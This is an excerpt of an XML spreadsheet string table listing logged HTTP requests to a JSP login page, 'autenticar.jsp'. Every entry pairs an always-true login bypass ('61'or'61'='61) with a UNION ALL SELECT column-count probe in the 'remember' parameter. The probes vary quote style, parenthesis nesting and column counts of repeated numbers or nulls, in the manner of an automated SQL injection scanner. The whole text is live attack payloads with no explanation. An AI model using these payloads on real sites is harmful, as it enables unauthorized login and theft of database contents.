    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728--and(("ldis"="ldis&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5604,5604,5604,5604,5604,5604,5604,5604,5604,5604,5604,5604,5604,5604,5604--and(("xthk"="xthk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892--and(("jeqd"="jeqd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944--and(("ocxg"="ocxg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6795,6795,6795,6795,6795,6795,6795,6795,6795,6795,6795,6795,6795,6795,6795,6795,6795,6795--and(("dzlt"="dzlt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6092,6092,6092,6092,6092,6092,6092,6092,6092,6092,6092,6092,6092,6092,6092,6092,6092,6092,6092--and(("tfmg"="tfmg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect949,949,949,949,949,949,949,949,949,949,949,949,949,949,949,949,949,949,949,949--and(("clzx"="clzx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4871,4871,4871,4871,4871,4871,4871,4871,4871,4871,4871--and((("ndes"="ndes&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect467,467,467,467,467,467,467,467,467,467,467,467--and((("ewqv"="ewqv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4130,4130,4130,4130,4130,4130,4130,4130,4130,4130,4130,4130,4130--and((("wbcb"="wbcb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect879,879,879,879,879,879,879,879,879,879,879,879,879,879--and((("bwjm"="bwjm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012--and((("vlez"="vlez&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8588,8588,8588,8588,8588,8588,8588,8588,8588,8588,8588,8588,8588,8588,8588,8588--and((("jsnj"="jsnj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771--and((("vnpz"="vnpz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242--and((("mcvl"="mcvl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906--and((("pdom"="pdom&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424--and((("gzdj"="gzdj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2338,2338,2338,2338,2338,2338,2338,2338,2338,2338,2338--and"tpix"="tpix&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5516,5516,5516,5516,5516,5516,5516,5516,5516,5516,5516,5516--and"fywo"="fywo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090--and"jylb"="jylb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8475,8475,8475,8475,8475,8475,8475,8475,8475,8475,8475,8475,8475,8475--and"stku"="stku&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7469,7469,7469,7469,7469,7469,7469,7469,7469,7469,7469,7469,7469,7469,7469--and"eoac"="eoac&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5098,5098,5098,5098,5098,5098,5098,5098,5098,5098,5098,5098,5098,5098,5098,5098--and"yfrz"="yfrz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4618,4618,4618,4618,4618,4618,4618,4618,4618,4618,4618,4618,4618,4618,4618,4618,4618--and"uafn"="uafn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8989,8989,8989,8989,8989,8989,8989,8989,8989,8989,8989,8989,8989,8989,8989,8989,8989,8989--and"cnmx"="cnmx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094--and"ltsc"="ltsc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4047,4047,4047,4047,4047,4047,4047,4047,4047,4047,4047,4047,4047,4047,4047,4047,4047,4047,4047,4047--and"rmjh"="rmjh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3449,3449,3449,3449,3449,3449,3449,3449,3449,3449,3449--and("hrww"like"hrww&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182,6182--and("evrx"like"evrx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8696,8696,8696,8696,8696,8696,8696,8696,8696,8696,8696,8696,8696--and("sgvk"like"sgvk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1528,1528,1528,1528,1528,1528,1528,1528,1528,1528,1528,1528,1528,1528--and("plnd"like"plnd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835--and("ubme"like"ubme&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526--and("phuu"like"phuu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect124,124,124,124,124,124,124,124,124,124,124,124,124,124,124,124,124--and("wmnm"like"wmnm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159--and("yglb"like"yglb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1726,1726,1726,1726,1726,1726,1726,1726,1726,1726,1726,1726,1726,1726,1726,1726,1726,1726,1726--and("hzkw"like"hzkw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2254,2254,2254,2254,2254,2254,2254,2254,2254,2254,2254,2254,2254,2254,2254,2254,2254,2254,2254,2254--and("tzjo"like"tzjo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9181,9181,9181,9181,9181,9181,9181,9181,9181,9181,9181--and(("hrrf"like"hrrf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6746,6746,6746,6746,6746,6746,6746,6746,6746,6746,6746,6746--and(("obqx"like"obqx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343--and(("bjoa"like"bjoa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3892,3892,3892,3892,3892,3892,3892,3892,3892,3892,3892,3892,3892,3892--and(("ialz"like"ialz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8576,8576,8576,8576,8576,8576,8576,8576,8576,8576,8576,8576,8576,8576,8576--and(("xlad"like"xlad&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2519,2519,2519,2519,2519,2519,2519,2519,2519,2519,2519,2519,2519,2519,2519,2519--and(("fbek"like"fbek&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8334,8334,8334,8334,8334,8334,8334,8334,8334,8334,8334,8334,8334,8334,8334,8334,8334--and(("wcch"like"wcch&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2687,2687,2687,2687,2687,2687,2687,2687,2687,2687,2687,2687,2687,2687,2687,2687,2687,2687--and(("quwn"like"quwn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4062,4062,4062,4062,4062,4062,4062,4062,4062,4062,4062,4062,4062,4062,4062,4062,4062,4062,4062--and(("jorw"like"jorw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2630,2630,2630,2630,2630,2630,2630,2630,2630,2630,2630,2630,2630,2630,2630,2630,2630,2630,2630,2630--and(("srmz"like"srmz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826--and((("mrgv"like"mrgv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2007,2007,2007,2007,2007,2007,2007,2007,2007,2007,2007,2007--and((("khns"like"khns&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9415,9415,9415,9415,9415,9415,9415,9415,9415,9415,9415,9415,9415--and((("dktx"like"dktx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725--and((("vfqp"like"vfqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5961,5961,5961,5961,5961,5961,5961,5961,5961,5961,5961,5961,5961,5961,5961--and((("nrjk"like"nrjk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1014,1014,1014,1014,1014,1014,1014,1014,1014,1014,1014,1014,1014,1014,1014,1014--and((("wkub"like"wkub&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1619,1619,1619,1619,1619,1619,1619,1619,1619,1619,1619,1619,1619,1619,1619,1619,1619--and((("rlhn"like"rlhn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7112,7112,7112,7112,7112,7112,7112,7112,7112,7112,7112,7112,7112,7112,7112,7112,7112,7112--and((("gxun"like"gxun&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6968,6968,6968,6968,6968,6968,6968,6968,6968,6968,6968,6968,6968,6968,6968,6968,6968,6968,6968--and((("mjvx"like"mjvx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845--and((("vuij"like"vuij&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883--and"oaoo"like"oaoo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2113,2113,2113,2113,2113,2113,2113,2113,2113,2113,2113,2113--and"dlhh"like"dlhh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7934,7934,7934,7934,7934,7934,7934,7934,7934,7934,7934,7934,7934--and"hbyz"like"hbyz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3077,3077,3077,3077,3077,3077,3077,3077,3077,3077,3077,3077,3077,3077--and"fguw"like"fguw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4297,4297,4297,4297,4297,4297,4297,4297,4297,4297,4297,4297,4297,4297,4297--and"iixo"like"iixo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84--and"ntlw"like"ntlw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405,5405--and"ffgw"like"ffgw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3095,3095,3095,3095,3095,3095,3095,3095,3095,3095,3095,3095,3095,3095,3095,3095,3095,3095--and"ldyq"like"ldyq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3718,3718,3718,3718,3718,3718,3718,3718,3718,3718,3718,3718,3718,3718,3718,3718,3718,3718,3718--and"vbvq"like"vbvq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5481,5481,5481,5481,5481,5481,5481,5481,5481,5481,5481,5481,5481,5481,5481,5481,5481,5481,5481,5481--and"eqqz"like"eqqz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect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--and(7366=7366&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(6055=6055&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(6001=6001&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(6721=6721&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(5042=5042&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(4519=4519&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(7505=7505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--and(3845=3845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--and(3136=3136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--and(9826=9826&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((8290=8290&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((5490=5490&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((5352=5352&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((5036=5036&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((1931=1931&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((6609=6609&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((3239=3239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--and((7056=7056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--and((6977=6977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--and((3708=3708&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((9101=9101&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((653=653&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((6077=6077&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((1609=1609&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((9934=9934&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((9036=9036&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((129=129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--and(((3001=3001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--and(((2784=2784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--and(((2108=2108&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect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--and('pdaw'='pdaw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('mxen'='mxen&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('qohd'='qohd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('dind'='dind&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('zhtx'='zhtx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('mple'='mple&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('gmma'='gmma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--and('kgrc'='kgrc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--and('exdh'='exdh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--and('luxz'='luxz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('vyrc'='vyrc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('dacp'='dacp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('ytgk'='ytgk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('xcvg'='xcvg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('twmm'='twmm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('mmpv'='mmpv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('mowu'='mowu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--and(('ujvt'='ujvt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--and(('znzr'='znzr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--and(('wonj'='wonj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('cxjb'='cxjb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('umng'='umng&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('trld'='trld&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('sdre'='sdre&amp;modo=entrar</t>
  </si>
  <si>
